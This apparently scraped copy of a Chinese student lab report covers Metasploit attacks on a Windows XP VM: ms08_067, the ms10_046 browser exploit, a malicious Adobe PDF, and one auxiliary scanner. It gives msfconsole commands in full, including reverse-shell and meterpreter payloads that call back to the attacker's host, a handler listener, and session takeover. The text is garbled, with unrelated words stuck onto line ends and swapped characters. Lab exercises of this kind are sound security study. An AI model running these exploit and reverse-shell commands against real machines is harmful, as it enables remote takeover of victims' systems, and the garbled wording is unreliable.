本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:shell
一个主动攻击实践,如ms08_067;windows
一个针对浏览器的攻击,如ms11_050;api
一个针对客户端的攻击,如Adobe;浏览器
成功应用任何一个辅助模块。session
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。框架
程序存在漏洞,敌手透过漏洞发送恶意代码控制被害主机。
恶意连接,其本意是攻击ie,可是一旦不当心打开了这样的连接就会被攻击。
恶意程序假装成常见的应用程序,以pdf为例,恶意程序攻击的是pdf,可是若是打开了这样的应用,就会中招。tcp
主要集成模块,即metasploit框架中所使用的软件代码组件。主要包括:
exploit
payload 有效载荷,即攻击所依附的主体
encode 改变shellcode形态,去掉坏字符
nop 空字符,做着陆区。
辅助模块,即攻击前提供目标准确信息以便发动更加精准的攻击。学习
auxiliary编码
/usr/share/metasploit-framework/modules : 模块目录。
search + 指令:查找相关的指令位置。
use + 模块名:使用模块。
info + 模块名:查看模块使用说明。
armitage : 使用图形化界面。
msfconsole -r +指令 :自动化执行。3d
攻击方:Kali Linux x64
靶机:Windows XP SP3(English)
关闭XP的全部防护,包括防火墙和杀毒软件。
在Kali机启动msfconsole,按照指导步骤输入如下代码:
use exploit/windows/smb/ms08_067_netapi // 使用ms08_067漏洞攻击方式 set payload generic/shell_reverse_tcp // 以shell反向tcp链接为有效载荷 set RHOST 192.168.129.134 // 受害者的IP set LHOST 192.168.129.133 // 施害者的IP set target 0 // 设置目标,0为无差异攻击
输入exploit
开始发动攻击:
search ms10_046
找到能够攻击的模块use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show payloads
选择攻击载荷,咱们选择generic/shell_reverse_tcp
,输入命令set payload generic/shell_reverse_tcp
使用show options
查看配置设置并进行修改exploit
执行输入exploit
会出现一段URI:http://192.168.129.133:80/,同时控制台进入监听状态。
受害者访问这个神奇的URI,会弹出一个这样的窗口:
控制台同受害者创建起一个链接:
对配置进行修改,选用set payload windows/meterpreter/reverse_tcp
,设置后查看结果,输入sessions
查看到一个ID号为1的会话:
输入sessions
查看有多少机器被反向连接到Kali机上(只有一个)。
再次输入sessions -i
1以控制受害者。
search adobe
查询和adobe漏洞有关的模块,输入命令exploit/windows/fileformat/adobe_pdf_embedded_exe
windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
使用攻击载荷exploit
执行查看结果同时,在Kali的msfconsole上输入如下命令开始监听:
use exploit/multi/handler set LHOST 192.168.129.133 set LPORT 4444 exploit
获得结果:
show auxiliary
查看辅助模块,并挑选使用scanner/http/options
use scanner/http/options
,输入info
查看信息exploit
执行此次实践多了本身思考的过程,感受对msf的了解更多了一点,也更加能经过这种借鉴别人而后本身尝试的方式学习到更多